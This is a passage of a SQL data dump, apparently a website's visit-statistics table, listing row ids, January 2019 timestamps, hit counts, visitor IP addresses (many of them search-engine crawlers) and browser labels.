0,'157.55.39.75','other'),(377335,1548397675,1,1,0,0,'66.249.69.148','chrome'),(377336,1548397710,1,1,0,0,'66.249.69.150','chrome'),(377337,1548397773,1,1,0,0,'40.77.167.107','other'),(377338,1548397986,5,5,0,0,'216.244.66.241','other'),(377339,1548398262,1,1,0,0,'94.178.14.231','chrome'),(377340,1548398342,1,1,0,0,'54.36.149.49','other'),(377341,1548398402,1,1,0,0,'54.36.148.211','other'),(377342,1548398488,1,1,0,0,'54.36.148.215','other'),(377343,1548398532,1,1,0,0,'66.249.75.155','chrome'),(377344,1548398533,1,1,0,0,'66.249.75.144','chrome'),(377345,1548398635,2,2,0,0,'91.196.177.110','chrome'),(377346,1548398763,1,1,0,0,'54.36.148.49','other'),(377347,1548399037,1,1,0,0,'157.55.39.185','other'),(377348,1548399288,1,1,0,0,'207.46.13.229','other'),(377349,1548399430,1,1,0,0,'91.239.241.9','chrome'),(377350,1548399453,9,9,0,0,'216.244.66.241','other'),(377351,1548399514,2,2,0,0,'66.249.69.149','chrome'),(377352,1548399592,1,1,0,0,'54.36.148.41','other'),(377353,1548399652,1,1,0,0,'54.36.148.100','other'),(377354,1548399725,1,1,0,0,'46.229.168.130','other'),(377355,1548399754,1,1,0,0,'46.229.168.151','other'),(377356,1548399757,2,2,0,0,'157.55.39.75','other'),(377357,1548399876,1,1,0,0,'37.9.113.20','other'),(377358,1548399903,1,1,0,0,'46.229.168.143','other'),(377359,1548400119,1,1,0,0,'66.249.69.150','chrome'),(377360,1548400121,1,1,0,0,'66.249.69.148','chrome'),(377361,1548400160,1,1,0,0,'54.36.149.72','other'),(377362,1548400172,1,1,0,0,'54.36.149.27','other'),(377363,1548400180,1,1,0,0,'46.229.168.134','other'),(377364,1548400202,1,1,0,0,'66.249.75.142','chrome'),(377365,1548400230,1,1,0,0,'87.250.224.65','other'),(377366,1548400261,1,1,0,0,'54.36.148.211','other'),(377367,1548400454,1,1,0,0,'54.36.149.71','other'),(377368,1548400624,1,1,0,0,'66.249.69.149','chrome'),(377369,1548400707,1,1,0,0,'216.244.66.241','other'),(377370,1548400760,1,1,0,0,'54.36.148.66','other'),(377371,1548400763,1,1,0,0,'5.45.207.19','other'),(377372,1548401049,2,2,0,0,'87.250.224.47','other'),(377373,1548401177,1,1,0,0,'66.249.75.142','chrome'),(377374,1548401263,1,1,0,0,'66.249.69.145','chrome'),(377375,1548401290,1,1,0,0,'54.36.148.173','other'),(377376,1548401460,1,1,0,0,'66.249.69.150','chrome'),(377377,1548401745,1,1,0,0,'91.196.178.132','chrome'),(377378,1548401767,1,1,0,0,'54.36.149.70','other'),(377379,1548401785,3,3,0,0,'5.45.207.79','other'),(377380,1548401800,1,1,0,0,'54.36.149.67','other'),(377381,1548401827,1,1,0,0,'54.36.148.149','other'),(377382,1548401905,1,1,0,0,'95.134.202.95','chrome'),(377383,1548401947,1,1,0,0,'66.249.75.155','chrome'),(377384,1548401948,1,1,0,0,'66.249.75.144','chrome'),(377385,1548402226,13,13,0,0,'216.244.66.241','other'),(377386,1548402242,1,1,0,0,'178.154.244.11','other'),(377387,1548402254,2,2,0,0,'178.92.177.58','chrome'),(377388,1548402626,1,1,0,0,'157.55.39.75','other'),(377389,1548402656,1,1,0,0,'54.36.149.24','other'),(377390,1548402667,1,1,0,0,'66.249.75.140','chrome'),(377391,1548402869,1,1,0,0,'54.36.148.63','other'),(377392,1548402874,1,1,0,0,'46.219.221.60','chrome'),(377393,1548402964,1,1,0,0,'54.36.148.166','other'),(377394,1548402979,1,1,0,0,'54.36.148.240','other'),(377395,1548403406,2,2,0,0,'91.196.178.78','firefox'),(377396,1548403454,2,2,0,0,'216.244.66.241','other'),(377397,1548403504,1,1,0,0,'5.45.207.19','other'),(377398,1548403685,1,1,0,0,'54.36.148.163','other'),(377399,1548403718,1,1,0,0,'8.29.198.27','other'),(377400,1548403769,1,1,0,0,'40.77.167.16','other'),(377401,1548403882,1,1,0,0,'66.249.69.148','chrome'),(377402,1548403906,2,2,0,0,'178.251.107.35','chrome'),(377403,1548403918,1,1,0,0,'54.36.148.41','other'),(377404,1548404130,1,1,0,0,'66.249.69.143','chrome'),(377405,1548404131,3,3,0,0,'66.249.69.150','chrome'),(377406,1548404328,1,1,0,0,'54.36.148.138','other'),(377407,1548404450,1,1,0,0,'54.36.148.103','other'),(377408,1548404497,1,1,0,0,'54.36.148.249','other'),(377409,1548404501,1,1,0,0,'54.36.148.56','other'),(377410,1548404510,1,1,0,0,'54.36.148.87','other'),(377411,1548404918,2,2,0,0,'91.196.178.66','chrome'),(377412,1548405004,7,7,0,0,'216.244.66.241','other'),(377413,1548405226,1,1,0,0,'54.36.148.183','other'),(377414,1548405416,1,1,0,0,'54.36.148.96','other'),(377415,1548405699,1,1,0,0,'8.29.198.27','other'),(377416,1548405763,6,6,0,0,'66.249.69.148','chrome'),(377417,1548405783,1,1,0,0,'54.36.149.86','other'),(377418,1548405952,1,1,0,0,'91.196.178.73','chrome'),(377419,1548405967,5,5,0,0,'216.244.66.241','other'),(377420,1548406076,1,1,0,0,'54.36.148.16','other'),(377421,1548406193,1,1,0,0,'5.45.207.79','other'),(377422,1548406304,1,1,0,0,'54.36.149.58','other'),(377423,1548406386,3,3,0,0,'66.249.69.149','chrome'),(377424,1548406387,1,1,0,0,'54.36.149.99','other'),(377425,1548406552,1,1,0,0,'54.36.148.148','other'),(377426,1548406615,2,2,0,0,'91.196.178.66','chrome'),(377427,1548406667,1,1,0,0,'54.36.148.232','other'),(377428,1548406674,2,2,0,0,'54.36.148.208','other'),(377429,1548406734,1,1,0,0,'66.249.75.142','chrome'),(377430,1548406742,1,1,0,0,'66.249.69.148','chrome'),(377431,1548406778,1,1,0,0,'54.36.149.62','other'),(377432,1548406961,1,1,0,0,'54.36.148.214','other'),(377433,1548407059,3,3,0,0,'216.244.66.241','other'),(377434,1548407090,1,1,0,0,'54.36.148.217','other'),(377435,1548407104,1,1,0,0,'54.36.148.87','other'),(377436,1548407271,1,1,0,0,'54.36.148.236','other'),(377437,1548407472,1,1,0,0,'54.36.148.143','other'),(377438,1548407513,1,1,0,0,'54.36.148.48','other'),(377439,1548407558,1,1,0,0,'66.249.69.149','chrome'),(377440,1548407560,3,3,0,0,'66.249.69.150','chrome'),(377441,1548407673,1,1,0,0,'95.134.202.95','chrome'),(377442,1548407838,1,1,0,0,'66.249.75.157','chrome'),(377443,1548407839,1,1,0,0,'66.249.75.140','chrome'),(377444,1548408040,1,1,0,0,'178.92.177.58','chrome'),(377445,1548408128,1,1,0,0,'54.36.148.77','other'),(377446,1548408131,1,1,0,0,'46.133.196.227','chrome'),(377447,1548408172,4,4,0,0,'216.244.66.241','other'),(377448,1548408486,2,2,0,0,'91.196.178.66','chrome'),(377449,1548408813,1,1,0,0,'54.36.149.40','other'),(377450,1548408856,1,1,0,0,'54.36.148.158','other'),(377451,1548408946,1,1,0,0,'54.36.148.138','other'),(377452,1548409192,2,2,0,0,'216.244.66.241','other'),(377453,1548409225,1,1,0,0,'51.255.65.46','other'),(377454,1548409490,1,1,0,0,'54.36.148.189','other'),(377455,1548410004,2,2,0,0,'46.229.168.154','other'),(377456,1548410389,1,1,0,0,'66.249.69.148','chrome'),(377457,1548410494,1,1,0,0,'46.229.168.132','other'),(377458,1548410504,1,1,0,0,'54.36.148.91','other'),(377459,1548410506,17,17,0,0,'216.244.66.241','other'),(377460,1548410534,1,1,0,0,'46.229.168.138','other'),(377461,1548410560,1,1,0,0,'66.249.75.140','chrome'),(377462,1548410666,1,1,0,0,'54.36.148.135','other'),(377463,1548411048,1,1,0,0,'212.26.139.166','chrome'),(377464,1548411279,2,2,0,0,'52.70.8.37','firefox'),(377465,1548411526,1,1,0,0,'216.244.66.241','other'),(377466,1548411605,2,2,0,0,'37.53.209.216','firefox'),(377467,1548411620,1,1,0,0,'178.154.244.11','other'),(377468,1548411756,1,1,0,0,'204.85.191.30','other'),(377469,1548412064,1,1,0,0,'46.229.168.135','other'),(377470,1548412094,1,1,0,0,'54.36.148.22','other'),(377471,1548412178,1,1,0,0,'54.36.148.146','other'),(377472,1548412240,1,1,0,0,'54.36.148.175','other'),(377473,1548412260,1,1,0,0,'46.229.168.145','other'),(377474,1548412313,1,1,0,0,'54.36.148.101','other'),(377475,1548412554,1,1,0,0,'54.36.149.42','other'),(377476,1548412809,2,2,0,0,'95.132.14.103','chrome'),(377477,1548412919,1,1,0,0,'54.36.149.57','other'),(377478,1548413189,1,1,0,0,'54.36.148.32','other'),(377479,1548413228,2,2,0,0,'195.211.174.50','chrome'),(377480,1548413230,2,2,0,0,'54.36.148.209','other'),(377481,1548413265,6,6,0,0,'216.244.66.241','other'),(377482,1548413310,1,1,0,0,'46.229.168.140','other'),(377483,1548413333,1,1,0,0,'54.36.148.28','other'),(377484,1548413493,2,2,0,0,'213.180.203.9','other'),(377485,1548413500,1,1,0,0,'54.36.149.84','other'),(377486,1548413698,1,1,0,0,'54.36.148.215','other'),(377487,1548413891,1,1,0,0,'54.36.148.180','other'),(377488,1548414194,3,3,0,0,'178.154.244.11','other'),(377489,1548414222,8,8,0,0,'216.244.66.241','other'),(377490,1548414316,1,1,0,0,'95.108.213.4','other'),(377491,1548414447,1,1,0,0,'54.36.148.138','other'),(377492,1548414539,1,1,0,0,'8.29.198.27','other'),(377493,1548414571,1,1,0,0,'54.36.149.11','other'),(377494,1548414614,1,1,0,0,'54.36.149.45','other'),(377495,1548414750,1,1,0,0,'54.36.148.165','other'),(377496,1548414764,1,1,0,0,'213.180.203.9','other'),(377497,1548414883,1,1,0,0,'141.8.142.103','other'),(377498,1548414962,1,1,0,0,'54.36.149.13','other'),(377499,1548415443,1,1,0,0,'5.45.207.19','other'),(377500,1548415447,1,1,0,0,'46.229.168.150','other'),(377501,1548415463,1,1,0,0,'54.36.148.49','other'),(377502,1548415589,1,1,0,0,'54.36.148.212','other'),(377503,1548415760,1,1,0,0,'46.229.168.148','other'),(377504,1548415761,1,1,0,0,'80.70.72.80','chrome'),(377505,1548415779,1,1,0,0,'54.36.148.153','other'),(377506,1548415780,1,1,0,0,'40.77.167.23','other'),(377507,1548416069,6,6,0,0,'216.244.66.241','other'),(377508,1548416121,1,1,0,0,'37.9.113.20','other'),(377509,1548416162,1,1,0,0,'207.46.13.63','other'),(377510,1548416308,1,1,0,0,'54.36.148.74','other'),(377511,1548416314,1,1,0,0,'207.46.13.247','other'),(377512,1548416526,1,1,0,0,'141.8.142.103','other'),(377513,1548416558,1,1,0,0,'8.29.198.27','other'),(377514,1548416561,1,1,0,0,'66.249.75.15','chrome'),(377515,1548416562,1,1,0,0,'66.249.75.22','chrome'),(377516,1548416806,1,1,0,0,'54.36.148.248','other'),(377517,1548416922,1,1,0,0,'46.229.168.130','other'),(377518,1548416996,4,4,0,0,'216.244.66.241','other'),(377519,1548417047,1,1,0,0,'54.36.149.58','other'),(377520,1548417170,1,1,0,0,'54.36.149.37','other'),(377521,1548417307,1,1,0,0,'66.249.75.16','chrome'),(377522,1548417411,1,1,0,0,'54.36.148.220','other'),(377523,1548417699,1,1,0,0,'54.36.148.89','other'),(377524,1548417805,1,1,0,0,'54.36.148.216','other'),(377525,1548417814,1,1,0,0,'54.36.148.148','other'),(377526,1548418268,1,1,0,0,'54.36.148.130','other'),(377527,1548418327,1,1,0,0,'54.36.148.225','other'),(377528,1548418366,1,1,0,0,'54.36.149.69','other'),(377529,1548418424,1,1,0,0,'54.36.149.22','other'),(377530,1548418426,1,1,0,0,'54.36.149.36','other'),(377531,1548418654,1,1,0,0,'157.55.39.185','other'),(377532,1548418762,1,1,0,0,'54.36.149.44','other'),(377533,1548418764,3,3,0,0,'216.244.66.241','other'),(377534,1548418830,2,2,0,0,'66.249.75.144','chrome'),(377535,1548419123,1,1,0,0,'40.77.167.49','other'),(377536,1548419468,1,1,0,0,'54.36.149.11','other'),(377537,1548419596,1,1,0,0,'54.36.148.111','other'),(377538,1548419683,1,1,0,0,'157.55.39.51','other'),(377539,1548419782,1,1,0,0,'54.36.149.4','other'),(377540,1548419855,1,1,0,0,'54.36.149.12','other'),(377541,1548419904,2,2,0,0,'216.244.66.241','other'),(377542,1548420444,1,1,0,0,'54.36.148.127','other'),(377543,1548420472,1,1,0,0,'54.36.148.118','other'),(377544,1548420660,1,1,0,0,'54.36.148.110','other'),(377545,1548420904,1,1,0,0,'54.36.149.2','other'),(377546,1548421047,1,1,0,0,'54.36.149.12','other'),(377547,1548421508,12,12,0,0,'216.244.66.241','other'),(377548,1548421733,2,1,1,0,'66.249.75.142',''),(377549,1548421827,1,1,0,0,'5.45.207.19','other'),(377550,1548422070,1,1,0,0,'54.36.148.188','other'),(377551,1548422113,1,1,0,0,'54.36.149.4','other'),(377552,1548422190,1,1,0,0,'54.36.148.86','other'),(377553,1548422260,1,1,0,0,'40.77.167.23','other'),(377554,1548422296,1,1,0,0,'46.229.168.154','other'),(377555,1548422411,1,1,0,0,'54.36.148.102','other'),(377556,1548422416,4,4,0,0,'216.244.66.241','other'),(377557,1548422482,1,1,0,0,'46.229.168.141','other'),(377558,1548422494,1,1,0,0,'54.36.148.247','other'),(377559,1548422638,1,1,0,0,'212.111.194.3','chrome'),(377560,1548422696,1,1,0,0,'54.36.149.70','other'),(377561,1548422814,1,1,0,0,'54.36.148.222','other'),(377562,1548422841,1,1,0,0,'54.36.148.223','other'),(377563,1548422859,1,1,0,0,'54.36.148.149','other'),(377564,1548422904,2,2,0,0,'54.36.148.128','other'),(377565,1548422952,1,1,0,0,'91.209.11.236','other'),(377566,1548422973,1,1,0,0,'54.36.148.191','other'),(377567,1548423135,1,1,0,0,'54.36.148.214','other'),(377568,1548423251,1,1,0,0,'66.249.75.144','chrome'),(377569,1548423586,1,1,0,0,'54.36.148.61','other'),(377570,1548423588,1,1,0,0,'54.36.148.32','other'),(377571,1548423844,8,8,0,0,'91.196.178.66','chrome'),(377572,1548423847,1,1,0,0,'54.36.148.72','other'),(377573,1548423923,1,1,0,0,'54.36.148.201','other'),(377574,1548423990,1,1,0,0,'54.36.148.152','other'),(377575,1548424028,1,1,0,0,'46.229.168.148','other'),(377576,1548424130,1,1,0,0,'69.4.89.106','firefox'),(377577,1548424131,1,1,0,0,'69.4.89.106','other'),(377578,1548424334,8,8,0,0,'216.244.66.241','other'),(377579,1548424514,1,1,0,0,'46.133.180.230','chrome'),(377580,1548424615,2,2,0,0,'69.4.87.74','firefox'),(377581,1548424868,1,1,0,0,'54.36.148.159','other'),(377582,1548424875,1,1,0,0,'54.36.148.147','other'),(377583,1548425021,1,1,0,0,'54.36.149.59','other'),(377584,1548425215,1,1,0,0,'54.36.148.139','other'),(377585,1548425264,4,4,0,0,'216.244.66.241','other'),(377586,1548425282,1,1,0,0,'54.36.149.46','other'),(377587,1548425377,1,1,0,0,'8.29.198.25','other'),(377588,1548425410,2,2,0,0,'93.119.227.19','chrome'),(377589,1548425414,1,1,0,0,'54.36.148.209','other'),(377590,1548425427,1,1,0,0,'46.229.168.142','other'),(377591,1548425639,1,1,0,0,'54.36.148.115','other'),(377592,1548425819,1,1,0,0,'38.130.171.165','other'),(377593,1548425827,1,1,0,0,'46.229.168.145','other'),(377594,1548425946,1,1,0,0,'109.251.209.3','chrome'),(377595,1548425959,1,1,0,0,'54.36.149.73','other'),(377596,1548426020,1,1,0,0,'38.130.168.222','firefox'),(377597,1548426218,1,1,0,0,'66.249.75.144','chrome'),(377598,1548426228,1,1,0,0,'54.36.149.34','other'),(377599,1548426230,1,1,0,0,'82.145.208.89','other'),(377600,1548426269,2,2,0,0,'66.249.75.21','chrome'),(377601,1548426301,1,1,0,0,'46.229.168.137','other'),(377602,1548426331,1,1,0,0,'54.36.148.227','other'),(377603,1548426465,1,1,0,0,'54.36.148.48','other'),(377604,1548426507,1,1,0,0,'66.249.75.20','chrome'),(377605,1548426534,1,1,0,0,'54.36.149.23','other'),(377606,1548426787,4,4,0,0,'46.211.122.168','chrome'),(377607,1548426977,1,1,0,0,'5.45.207.79','other'),(377608,1548426992,1,1,0,0,'93.119.227.91','other'),(377610,1548427103,1,1,0,0,'157.55.39.185','other'),(377611,1548427326,1,1,0,0,'82.145.211.84','other'),(377612,1548427340,1,1,0,0,'54.36.148.80','other'),(377613,1548427410,1,1,0,0,'8.29.198.25','other'),(377614,1548427507,1,1,0,0,'54.36.149.1','other'),(377615,1548427666,1,1,0,0,'54.36.148.184','other'),(377616,1548427865,1,1,0,0,'66.249.75.21','chrome'),(377617,1548428010,1,1,0,0,'54.36.148.180','other'),(377618,1548428059,1,1,0,0,'54.36.148.129','other'),(377619,1548428067,1,1,0,0,'5.45.207.19','other'),(377620,1548428071,1,1,0,0,'141.8.142.103','other'),(377621,1548428081,1,1,0,0,'95.108.213.4','other'),(377622,1548428116,4,4,0,0,'178.154.244.11','other'),(377623,1548428290,1,1,0,0,'54.36.148.249','other'),(377624,1548428335,1,1,0,0,'54.36.148.151','other'),(377625,1548428369,1,1,0,0,'54.36.148.190','other'),(377626,1548428495,1,1,0,0,'66.249.75.20','chrome'),(377627,1548428557,1,1,0,0,'5.45.207.79','other'),(377628,1548428986,1,1,0,0,'54.36.148.30','other'),(377629,1548429180,4,4,0,0,'66.249.75.21','chrome'),(377630,1548429576,1,1,0,0,'92.52.132.157','other'),(377631,1548429596,1,1,0,0,'54.36.149.16','other'),(377632,1548429598,1,1,0,0,'207.46.13.249','other'),(377633,1548429656,1,1,0,0,'46.211.122.168','chrome'),(377634,1548429806,7,7,0,0,'216.244.66.241','other'),(377635,1548429833,1,1,0,0,'54.36.149.10','other'),(377636,1548429994,1,1,0,0,'87.250.224.47','other'),(377637,1548430174,1,1,0,0,'66.249.75.21','chrome'),(377638,1548430207,5,5,0,0,'66.249.75.20','chrome'),(377639,1548430509,1,1,0,0,'180.76.15.22','other'),(377640,1548430562,2,2,0,0,'66.249.75.22','chrome'),(377641,1548430615,1,1,0,0,'5.45.207.79','other'),(377642,1548430721,1,1,0,0,'54.36.148.194','other'),(377643,1548431192,1,1,0,0,'77.121.108.169','chrome'),(377644,1548431247,6,6,0,0,'66.249.75.20','chrome'),(377645,1548431265,2,2,0,0,'66.249.75.21','chrome'),(377646,1548431326,1,1,0,0,'54.36.149.36','other'),(377647,1548431333,1,1,0,0,'54.36.148.165','other'),(377648,1548431420,1,1,0,0,'157.55.39.73','other'),(377649,1548431479,1,1,0,0,'54.36.148.160','other'),(377650,1548431539,2,2,0,0,'66.249.75.22','chrome'),(377651,1548431579,1,1,0,0,'54.36.148.127','other'),(377652,1548431671,1,1,0,0,'46.229.168.151','other'),(377653,1548431965,1,1,0,0,'54.36.148.12','other'),(377654,1548432149,1,1,0,0,'54.36.148.107','other'),(377655,1548432169,4,4,0,0,'66.249.75.20','chrome'),(377656,1548432251,1,1,0,0,'46.229.168.145','other'),(377657,1548432258,1,1,0,0,'54.36.149.38','other'),(377658,1548432487,1,1,0,0,'54.36.148.48','other'),(377659,1548432508,1,1,0,0,'180.76.15.7','other'),(377660,1548432517,1,1,0,0,'54.36.148.58','other'),(377661,1548432542,18,18,0,0,'216.244.66.241','other'),(377662,1548432551,1,1,0,0,'46.229.168.147','other'),(377663,1548432615,1,1,0,0,'54.36.148.21','other'),(377664,1548432618,1,1,0,0,'54.36.149.61','other'),(377665,1548432632,1,1,0,0,'46.229.168.140','other'),(377666,1548432712,1,1,0,0,'40.77.167.123','other'),(377667,1548432767,2,2,0,0,'66.249.75.21','chrome'),(377668,1548432825,1,1,0,0,'40.77.167.23','other'),(377669,1548433023,1,1,0,0,'54.36.148.29','other'),(377670,1548433183,1,1,0,0,'66.249.75.20','chrome'),(377671,1548433274,1,1,0,0,'46.229.168.141','other'),(377672,1548433328,1,1,0,0,'54.36.148.214','other'),(377673,1548433330,1,1,0,0,'46.229.168.146','other'),(377674,1548433698,2,2,0,0,'66.249.75.22','chrome'),(377675,1548433729,1,1,0,0,'46.229.168.143','other'),(377676,1548433774,1,1,0,0,'54.36.149.26','other'),(377677,1548433804,1,1,0,0,'54.36.149.48','other'),(377678,1548433854,1,1,0,0,'54.36.148.244','other'),(377679,1548433894,1,1,0,0,'216.244.66.241','other'),(377680,1548434258,4,4,0,0,'66.249.75.21','chrome'),(377681,1548434274,1,1,0,0,'54.36.148.28','other'),(377682,1548434502,1,1,0,0,'54.36.149.1','other'),(377683,1548434712,1,1,0,0,'54.36.149.99','other'),(377684,1548434761,1,1,0,0,'180.76.15.145','other'),(377685,1548435017,2,2,0,0,'66.249.75.22','chrome'),(377686,1548435034,1,1,0,0,'46.229.168.138','other'),(377687,1548435060,1,1,0,0,'54.36.148.239','other'),(377688,1548435093,1,1,0,0,'54.36.148.150','other'),(377689,1548435378,6,6,0,0,'216.244.66.241','other'),(377690,1548435384,3,3,0,0,'66.249.75.21','chrome'),(377691,1548435392,2,2,0,0,'66.249.75.20','chrome'),(377692,1548435944,2,2,0,0,'66.249.75.22','chrome'),(377693,1548436080,1,1,0,0,'54.36.149.91','other'),(377694,1548436202,1,1,0,0,'8.29.198.26','other'),(377695,1548436381,1,1,0,0,'54.36.148.62','other'),(377696,1548436395,1,1,0,0,'54.36.149.78','other'),(377697,1548436399,1,1,0,0,'46.229.168.139','other'),(377698,1548436607,6,6,0,0,'66.249.75.20','chrome'),(377699,1548436709,1,1,0,0,'54.36.148.115','other'),(377700,1548436734,4,4,0,0,'66.249.75.21','chrome'),(377701,1548436948,3,3,0,0,'216.244.66.241','other'),(377702,1548437297,2,2,0,0,'66.249.75.22','chrome'),(377703,1548437368,1,1,0,0,'66.249.75.140','chrome'),(377704,1548437617,1,1,0,0,'54.36.148.192','other'),(377705,1548437635,5,5,0,0,'66.249.75.20','chrome'),(377706,1548437849,2,2,0,0,'66.249.75.21','chrome'),(377707,1548438084,1,1,0,0,'66.249.69.149','chrome'),(377708,1548438153,7,7,0,0,'216.244.66.241','other'),(377709,1548438261,1,1,0,0,'8.29.198.27','other'),(377710,1548438417,1,1,0,0,'91.196.178.70','firefox'),(377711,1548438565,4,4,0,0,'66.249.75.20','chrome'),(377712,1548438567,3,3,0,0,'66.249.75.22','chrome'),(377713,1548438863,5,5,0,0,'66.249.75.21','chrome'),(377714,1548439148,5,5,0,0,'216.244.66.241','other'),(377715,1548439305,1,1,0,0,'178.133.123.234','chrome'),(377716,1548439534,1,1,0,0,'66.249.75.20','chrome'),(377717,1548439626,1,1,0,0,'185.211.245.158','chrome'),(377718,1548439787,2,2,0,0,'66.249.75.21','chrome'),(377719,1548439825,1,1,0,0,'46.229.168.133','other'),(377720,1548439862,1,1,0,0,'46.229.168.130','other'),(377721,1548439934,2,2,0,0,'46.229.168.138','other'),(377722,1548440001,2,2,0,0,'66.249.75.142','chrome'),(377723,1548440113,5,5,0,0,'216.244.66.241','other'),(377724,1548440945,1,1,0,0,'66.249.75.21','chrome'),(377725,1548441263,10,10,0,0,'216.244.66.241','other'),(377726,1548441353,1,1,0,0,'66.249.75.20','chrome'),(377727,1548442158,3,3,0,0,'5.45.207.79','other'),(377728,1548442321,9,9,0,0,'35.233.41.151','other'),(377729,1548442413,2,2,0,0,'216.244.66.241','other'),(377730,1548442750,2,2,0,0,'66.249.75.22','chrome'),(377731,1548442922,2,2,0,0,'5.45.207.19','other'),(377732,1548442994,3,3,0,0,'178.154.244.11','other'),(377733,1548443170,1,1,0,0,'46.229.168.132','other'),(377734,1548443323,1,1,0,0,'141.8.142.103','other'),(377735,1548443390,1,1,0,0,'66.249.75.21','chrome'),(377736,1548443419,4,4,0,0,'5.45.207.79','other'),(377737,1548443658,1,1,0,0,'46.229.168.130','other'),(377738,1548443689,12,12,0,0,'216.244.66.241','other'),(377739,1548443928,1,1,0,0,'5.45.207.19','other'),(377740,1548444034,1,1,0,0,'66.249.75.22','chrome'),(377741,1548444573,1,1,0,0,'180.76.15.146','other'),(377742,1548444596,3,3,0,0,'216.244.66.241','other'),(377743,1548445487,1,1,0,0,'66.249.75.22','chrome'),(377744,1548446417,10,10,0,0,'216.244.66.241','other'),(377745,1548446516,1,1,0,0,'46.229.168.134','other'),(377746,1548447042,1,1,0,0,'8.29.198.26','other'),(377747,1548447114,1,1,0,0,'46.133.114.209','chrome'),(377748,1548447263,1,1,0,0,'40.77.167.123','other'),(377749,1548447600,1,1,0,0,'66.249.75.140','chrome'),(377750,1548447737,2,2,0,0,'216.244.66.241','other'),(377751,1548448008,1,1,0,0,'5.45.207.19','other'),(377752,1548448116,1,1,0,0,'46.229.168.140','other'),(377753,1548448277,1,1,0,0,'46.229.168.139','other'),(377754,1548448942,1,1,0,0,'66.249.75.140','chrome'),(377755,1548448952,1,1,0,0,'157.55.39.95','other'),(377756,1548449117,1,1,0,0,'8.29.198.27','other'),(377757,1548449156,10,10,0,0,'216.244.66.241','other'),(377758,1548449926,1,1,0,0,'66.249.75.21','chrome'),(377759,1548450168,1,1,0,0,'40.77.167.105','other'),(377760,1548450215,2,2,0,0,'40.77.167.123','other'),(377761,1548450346,1,1,0,0,'40.77.167.142','other'),(377762,1548451590,1,1,0,0,'66.249.75.21','chrome'),(377763,1548451936,11,11,0,0,'216.244.66.241','other'),(377764,1548452749,13,13,0,0,'69.30.226.234','other'),(377765,1548452760,1,1,0,0,'78.46.176.21','other'),(377766,1548452847,1,1,0,0,'5.45.207.79','other'),(377767,1548453033,1,1,0,0,'66.249.75.22','chrome'),(377768,1548453110,1,1,0,0,'216.244.66.241','other'),(377769,1548453428,1,1,0,0,'46.229.168.148','other'),(377770,1548453486,1,1,0,0,'46.229.168.133','other'),(377771,1548454133,1,1,0,0,'54.36.149.62','other'),(377772,1548454523,4,4,0,0,'178.154.244.11','other'),(377773,1548454528,1,1,0,0,'54.36.149.42','other'),(377774,1548454671,10,10,0,0,'216.244.66.241','other'),(377775,1548455447,1,1,0,0,'13.57.233.99','chrome'),(377776,1548455541,1,1,0,0,'178.154.244.11','other'),(377777,1548455657,1,1,0,0,'66.249.75.144','chrome'),(377778,1548455695,3,3,0,0,'216.244.66.241','other'),(377779,1548455759,1,1,0,0,'66.249.75.142','chrome'),(377780,1548455996,1,1,0,0,'5.45.207.19','other'),(377781,1548456255,1,1,0,0,'46.229.168.142','other'),(377782,1548456414,2,2,0,0,'95.108.213.4','other'),(377783,1548456586,1,1,0,0,'54.36.148.78','other'),(377784,1548456695,1,1,0,0,'54.36.148.217','other'),(377785,1548456858,1,1,0,0,'54.36.148.93','other'),(377786,1548457455,1,1,0,0,'5.45.207.19','other'),(377787,1548457547,8,8,0,0,'216.244.66.241','other'),(377788,1548457552,1,1,0,0,'37.9.113.148','other'),(377789,1548457579,1,1,0,0,'40.77.167.35','other'),(377790,1548457749,1,1,0,0,'40.77.167.123','other'),(377791,1548457865,1,1,0,0,'178.154.244.11','other'),(377792,1548457874,1,1,0,0,'8.29.198.25','other'),(377793,1548457888,1,1,0,0,'54.36.148.27','other'),(377794,1548458130,1,1,0,0,'40.77.167.105','other'),(377795,1548458286,1,1,0,0,'46.229.168.132','other'),(377796,1548458378,1,1,0,0,'54.36.149.47','other'),(377797,1548458425,1,1,0,0,'66.249.75.21','chrome'),(377798,1548458436,1,1,0,0,'46.229.168.138','other'),(377799,1548458585,2,2,0,0,'66.249.69.149','chrome'),(377800,1548458898,1,1,0,0,'46.229.168.134','other'),(377801,1548458907,1,1,0,0,'66.249.75.22','chrome'),(377802,1548459011,1,1,0,0,'216.244.66.241','other'),(377803,1548459090,1,1,0,0,'54.36.148.250','other'),(377804,1548459450,1,1,0,0,'40.77.167.105','other'),(377805,1548459687,1,1,0,0,'54.36.148.231','other'),(377806,1548459753,1,1,0,0,'54.36.149.83','other'),(377807,1548459810,1,1,0,0,'54.36.148.107','other'),(377808,1548459895,1,1,0,0,'54.36.148.87','other'),(377809,1548459982,1,1,0,0,'8.29.198.26','other'),(377810,1548460178,23,23,0,0,'216.244.66.241','other'),(377811,1548460323,1,1,0,0,'46.229.168.130','other'),(377812,1548460697,1,1,0,0,'40.77.167.35','other'),(377813,1548461328,2,2,0,0,'216.244.66.241','other'),(377814,1548461647,1,1,0,0,'54.36.148.70','other'),(377815,1548461928,1,1,0,0,'66.249.75.220','chrome'),(377816,1548462755,1,1,0,0,'54.36.148.157','other'),(377817,1548462821,6,6,0,0,'216.244.66.241','other'),(377818,1548463188,1,1,0,0,'66.249.75.218','chrome'),(377819,1548463503,1,1,0,0,'66.249.75.220','chrome'),(377820,1548463522,1,1,0,0,'40.77.167.40','other'),(377821,1548463867,1,1,0,0,'54.36.148.228','other'),(377822,1548463953,2,2,0,0,'46.229.168.153','other'),(377823,1548464168,1,1,0,0,'54.36.148.229','other'),(377824,1548464198,1,1,0,0,'178.154.244.11','other'),(377825,1548464601,1,1,0,0,'46.229.168.138','other'),(377826,1548464654,1,1,0,0,'54.36.148.246','other'),(377827,1548464920,1,1,0,0,'46.229.168.129','other'),(377828,1548465218,1,1,0,0,'40.77.167.35','other'),(377829,1548465220,1,1,0,0,'54.36.149.16','other'),(377830,1548465222,1,1,0,0,'54.36.149.14','other'),(377831,1548465548,12,12,0,0,'216.244.66.241','other'),(377832,1548465609,1,1,0,0,'54.36.149.45','other'),(377833,1548465764,1,1,0,0,'54.36.148.79','other'),(377834,1548465999,1,1,0,0,'40.77.167.40','other'),(377835,1548466074,4,4,0,0,'66.249.69.124','chrome'),(377836,1548466078,12,12,0,0,'66.249.69.122','chrome'),(377837,1548466193,1,1,0,0,'95.163.255.162','other'),(377838,1548466576,1,1,0,0,'178.154.244.11','other'),(377839,1548466783,4,4,0,0,'176.9.25.107','other'),(377840,1548467129,1,1,0,0,'95.163.255.168','other'),(377841,1548467146,1,1,0,0,'216.244.66.241','other'),(377842,1548467398,109,109,0,0,'34.192.116.178','chrome'),(377843,1548467401,1,1,0,0,'34.192.116.178','other'),(